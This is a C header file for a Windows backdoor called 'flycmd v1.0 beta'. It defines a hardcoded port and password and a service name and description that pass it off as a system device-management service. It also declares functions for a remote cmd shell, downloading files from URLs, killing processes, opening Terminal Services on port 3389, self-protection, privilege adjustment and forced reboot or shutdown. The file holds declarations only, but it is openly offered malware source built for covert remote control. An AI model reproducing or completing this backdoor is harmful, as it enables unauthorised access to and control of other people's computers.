cmdbackdoor.h

一个功能强大的windows后门程序

#include <windows.h>
#include <stdio.h>
#include <urlmon.h> 
#include <tlhelp32.h>

#pragma comment(lib, "Urlmon.lib")
#pragma comment(lib, "ws2_32.lib")
#pragma comment(lib, "MPR.LIB")

#define PORT			"423      "
#define szServiceName	"Transaction Coordinator" 
#define szDisplayName	"管理设备安装以及配置，并且通知程序关于设备更改的情况。" 
#define EXENAME			"TransCoord.exe" 
#define PASSWORD		"5@ljwzj" 
#define STARTINFO		"\r\t\t╭═══════════════╮\n\r\t\t║ ★ flycmd v1.0 beta, by qfsl ║\n\r\t\t║ ★ E-mail:   qfsl@163.net    ║\n\r\t\t║ ★ Date:     02-04-2005      ║\n\r\t\t╟════════════◎★═╢\n\r\t\t║ ● Press help to get help    ║\n\r\t\t╰═══════════════╯\n\r" 
#define HELPINFO		"\n\r\tPress\t sysinfo  \t\tto get system info\n\r\tPress\t exit \t\t\tto quite\n\r\tPress\t plist\t\t\tto get Process info\n\r\tPress\t pkill ID \t\tto kill Process\n\r\tPress\t remove /y \t\tto remove me"
#define HELPINFO1		"\n\r\tPress\t http://url -filename \tto down file\n\r\tPress\t Reboot /y \t\tto Reboot computer\n\r\tPress\t shutdown /y \t\tto shutdown computer\n\r\tPress\t open3389 port\t\tto open Terminal Services \n\r\tPress\t other \t\t\tto use cmd shell"
#define BUFFER_SIZE		1024                    


void ServiceMain(DWORD dwArgc, LPTSTR *lpszArgv);
void ServiceCtrlHandler(DWORD dwCtrlCode);
void ServiceStop(); 
void ServiceStart();
bool ReportStatusToSCMgr(DWORD dwCurrentState, DWORD dwExitCode, DWORD dwWaitHint) ;

void ServiceThread(LPVOID lpParameter) ;
DWORD WINAPI ThreadGetCmd( LPVOID lpParam );
DWORD WINAPI ProtectSelf( LPVOID lpParam );

int ConnectRemote(int bConnect,char *lpHost,char *lpUserName,char *lpPassword) ;
void Start();
void Usage(char* cain);
void InstallCmdService(char *lpHost);
void RemoveCmdService(char *lpHost) ;

inline unsigned __int64 theCycleCount(void);

BOOL downfile(char* cmd,SOCKET ClientSocket);
BOOL sendcmd(char* cmd,SOCKET ClientSocket);
BOOL killps(DWORD id,SOCKET ClientSocket);
BOOL SetPrivilege(HANDLE hToken,LPCTSTR lpszPrivilege,BOOL bEnablePrivilege);//提示权限
int WriteReg(HKEY MainKey,LPCTSTR Subkey,LPCTSTR Vname, DWORD type, LPCTSTR  szBuf,DWORD dwData,int mode);

void pslist(SOCKET ClientSocket);
void sysinfo(SOCKET ClientSocket);
void Open3389(char* cmd ,SOCKET ClientSocket);
void RebootComputer(int type);


SERVICE_STATUS_HANDLE	sshStatusHandle; 
SERVICE_STATUS			ssStatus; 
HANDLE					hStopEvent; 

char cmd[BUFFER_SIZE];